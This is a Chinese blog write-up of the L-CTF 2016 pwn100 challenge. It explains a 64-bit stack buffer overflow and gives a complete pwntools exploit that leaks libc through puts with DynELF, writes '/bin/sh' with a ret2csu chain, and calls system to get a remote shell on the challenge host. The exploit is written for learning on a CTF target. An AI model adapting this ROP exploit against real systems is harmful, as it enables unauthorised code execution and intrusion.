(攻防世界)(2016 L-CTF)pwn100

最新推荐文章于 2024-05-23 14:45:00 发布
最新推荐文章于 2024-05-23 14:45:00 发布
阅读量2.4k 收藏
点赞数 1
文章标签: pwn 栈溢出 ROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/95624372
版权

这题也是一个DynELF()的栈溢出题,不过这里是运用了puts函数而不是write函数,所以我们构造的leak函数就要不同些。

拿到题目,我们首先查看一下保护:
在这里插入图片描述
可以看到,程序只开启了NX保护。
我们进入IDA看一下程序逻辑,找一找漏洞:
在这里插入图片描述
在这里插入图片描述
我们找到了puts和read函数,看到了明显的栈溢出漏洞,一般思路就是DynELF函数的利用了:
我们找到我们需要的一些地址,然后开始构造exp:

#!/usr/bin/env python
from pwn import *
import binascii
p=remote('111.198.29.45',*****)
elf=ELF('./pwn100')
puts_plt=elf.symbols['puts']
puts_got=elf.got['puts']
read_plt=elf.symbols['read']
read_got=elf.got['read']
pop_addr=0x040075a
mov_addr=0x0400740
#main_addr=0x04006b8
start_addr=0x0400550
prdi_addr=0x0400763
waddress=0x601000
def leak(address):
        count=0
        data=''
        payload='a'*0x48+p64(prdi_addr)+p64(address)+p64(puts_plt)+p64(start_addr)
        payload=payload.ljust(200,'B')
        p.send(payload)
        print p.recvuntil('bye~\n')
        up=""
        while True:
                c=p.recv(numb=1,timeout=0.5)
                count+=1
                if up=='\n' and c=="":
                        data=data[:-1]
                        data+="\x00"
                        break
                else:
                        data+=c
                up=c
        data=data[:4]
        log.info("%#x +> %s" % (address,(data or '').encode('hex')))
        return data
d=DynELF(leak,elf=ELF('./pwn100'))
sys_addr =d.lookup('__libc_system','libc')
print "sys_addr:", hex(sys_addr)
payload1='a'*0x48+p64(pop_addr)+p64(0)+p64(1)+p64(read_got)+p64(8)+p64(waddress)+p64(0)+p64(mov_addr)+'\x00'*56+p64(start_addr)
#对于这里的'\x00'*56返回到start地址取我还不是很明白,也是看了大佬的writeup才加上的
payload1=payload1.ljust(200,"B")
#对于这里的为什么要补充B到200也不是十分懂
p.send(payload1)
print p.recvuntil('bye~\n')
p.send("/bin/sh\x00")
payload2='a'*0x48+p64(prdi_addr)+p64(waddress)+p64(sys_addr)+p64(start_addr)
payload2=payload2.ljust(200,"B")
p.send(payload2)
p.interactive()

对于上面的为什么有’\x00’*56返回到start的地址,还有为什么每个payload都要补充B到200,这两个地方还不是很懂,有没有大佬路过,带带萌新吧!!!

补充:

根据一段时间的学习之后,加上大佬的指点,我终于知道了为什么要有**’\x00’56返回到start的地址**了。
原来是因为在mov之后又会跳转回6pop函数,我们可以看到,在6pop函数中有7个小段,就是7*8个字节才到retn,故我们才要写上‘\x00’*56才返回start的地址。
至于为什么要到两百那个问题,其实是程序本身的问题,程序本身就要输入两百个字符,不然就不给进行下一步。?

PLpa、
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
Lctf-2016-pwn100 题解
lifanxin的博客
12-24 791
Write Up知识点和关键字样本运行静态分析程序逻辑求解脚本 知识点和关键字 栈溢出 ROP 无libc泄露函数地址 样本 来自Lctf 2016年的pwn题,样本 pwn100 (这个资源没办法上传,想要样本的可以留言!) 运行 查看文件属性   64位程序,只开了NX保护 运行样本程序 输入超过200个字符串才会回显"bye~",接着报了一个段错误,程序结束 静态分析 把程序拖进到IDA查看,发现main函数比较简单,主要起作用的是sub_40068E()函数,我们直接进入到这个函数。 该函数又
LCTF 2016-pwn100 从一道题悟出的知识
qq_41071646的博客
01-20 1374
这道题可是让我吃尽了苦头啊~~~~~~  这道题没有像那么复杂 可是就是一直做不出来。。。。。。。。。。。 先说一下 参考的资料吧  https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&highlight=pwn 感谢i春秋的师傅   如果哪里不对 还请指教 首先这道题是 64位  那么 我们知道 x86...
[CTF_网络安全] 攻防世界 simple_js 解题详析
最新发布
qingkahui24689的博客
05-23 1742
[CTF_网络安全] 攻防世界 simple_js 解题详析,该题考察Javascript代码的解读及不同数值类型的转换姿。我们下次见,
LCTF-2016-PWN100
weixin_30455067的博客
10-08 222
栈溢出。可以通过libcdb.com获取libc.so.6和对应的libc关键函数偏移。或者使用libc-database。 #!/usr/bin/env python from pwn import * DEBUG = 1 if DEBUG: context.log_level = 'debug' p = process('./pwn1003s4d...
如何获得积分┭┮﹏┭┮
qq_44925469的博客
04-15 106
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 怎么获得积分...
pwn100题目文件及exp.zip
08-09
栈溢出漏洞,没有system函数下需要使用DynELF函数来泄漏函数地址,本资源是利用read和puts函数来进行泄漏
h1-702-2018-ctf-wu
05-09
4. **pwn**:在CTF领域,"pwn"通常指破解或控制目标系统的行为。在这个项目中,可能涉及到内存管理错误、缓冲区溢出等漏洞的利用。 5. **ctf**:Capture The Flag,一种网络安全竞赛,通常包括解谜、密码学、网络...
2016华山杯ctf安卓题目
06-17
CTF比赛通常包括逆向工程、密码学、Web安全、移动安全等多个方向,而安卓题目则聚焦于移动平台的安全问题,特别是针对Android系统的安全攻防。 【描述】2016年的华山杯CTF安卓题目反映了当时网络安全环境下的热点和...
CTFd-master_roseosy_ctf_
09-30
CTF 是一种流行的安全教育和竞技形式,参与者通过解决各种安全挑战来提升自己的技能,这些挑战通常涉及逆向工程、密码学、网络攻防、Web 安全等领域。CTFd 作为一个强大的平台,为创建和管理这类比赛提供了便捷。 1...
CTF从入门到提升(一).docx
12-18
CTF竞赛题型主要包括Web网络攻防、RE逆向工程、Pwn二进制漏洞利用、Crypto密码攻击、Mobile移动安全以及Misc安全杂项等。Web网络攻防是CTF的主要题型,题目涉及到许多常见的Web漏洞,如XSS、文件包含、代码执行、...
Imaginary CTF 2022 真题
08-01
"Imaginary CTF 2022 真题"是网络安全竞赛中的一种挑战集,这类活动通常由各种组织举办,旨在检验参赛者在逆向工程、取证分析、网络攻防、密码学以及杂项技能等多个IT领域的知识和能力。 Imaginary CTF 平台...
简单的练手栈溢出题 pwn100-附件资源
03-02
简单的练手栈溢出题 pwn100-附件资源
SniperOJ pwn100-bof writeup
0_Re5et
04-27 2458
在大佬的指导下拿到了人生中第一个pwn flag。感觉pwn真的帅的飞天了!在此简单记录一下思路。因为还没有补相关的基础知识,哪里不对的话还请各位大佬指出~比心~1. 首先查看文件版本命令 file filename 可以看到程序是64bit,linux平台下的 在这里补充一下查看本机操作系统位数的命令: getconf LONG-BIT 然后就去对应的系统下就ok了2. 查看源代码或运
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 2949
此题是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64位elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
pwn-100(L-CTF-2016)--write up
ATFWUS的博客
03-11 933
文件下载地址: 链接:https://pan.baidu.com/s/1SkbJmjnCtZETaafLEIUuLQ 提取码:wjb0 前言:风萧萧兮雨萧萧,忆君兮,不知。 0x01.分析 checksec: 分析源码: 发现主要功能在sub_40063D,我们分析一下该函数,发现,该函数的功能是:向v1写满200字节,且一定要写...
pwn100
pppp974的博客
07-18 253
这是一道64位的题,用rop来最终解决 exp如下: #coding:utf-8 from pwn import * from LibcSearcher import * io=remote('111.198.29.45',5) readn = 0x40063D start = 0x40068E read_got = 0x601028 put_plt = 0x400500 put_got = ...
CTF--2016XDCTF全国网络安全大赛之reverse5
关注互联网安全的小虾米一枚
03-10 6093
2016中国-XDCTF全国网络安全大赛 第七届全国网络安全大赛(XDCTF2016)暨第五届陕西省网络安全技能大赛
xdctf-pwn200
Vccxx的博客
04-08 1331
XDCTF (哪一年的忘了)中的一道pwn题题目地址http://pan.baidu.com/s/1hszHtwo解题思路:缓冲区溢出->泄露ebp->覆盖got表->执行shellcode首先用ida分析这题的反汇编:这里是一个关键的缓冲区溢出点,这里虽然v2的长度和读入的最大长度一致,但是我们知道对于printf函数,如果后面的地址中(这里是v2的栈地址)的内容没有”/x00”这样的结束符,就会
XDCTF PWN300&400 Writeup
这里没人
05-14 691
打了2天的XDCTF,被Reverse的题目教做人了。Sad (T.T) 到是pwn的题目基本打通了,除了最简单的pwn100 (T.T) pwn300和pwn400比较简单,所以writeup我就放在一起了。 PWN300 做完PWN300,感觉不会再有女朋友了T.T 就不吐槽猥琐的出题人了,直接开始分析程序。 checksec后发现竟然没有开nx,直接shellcode...
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值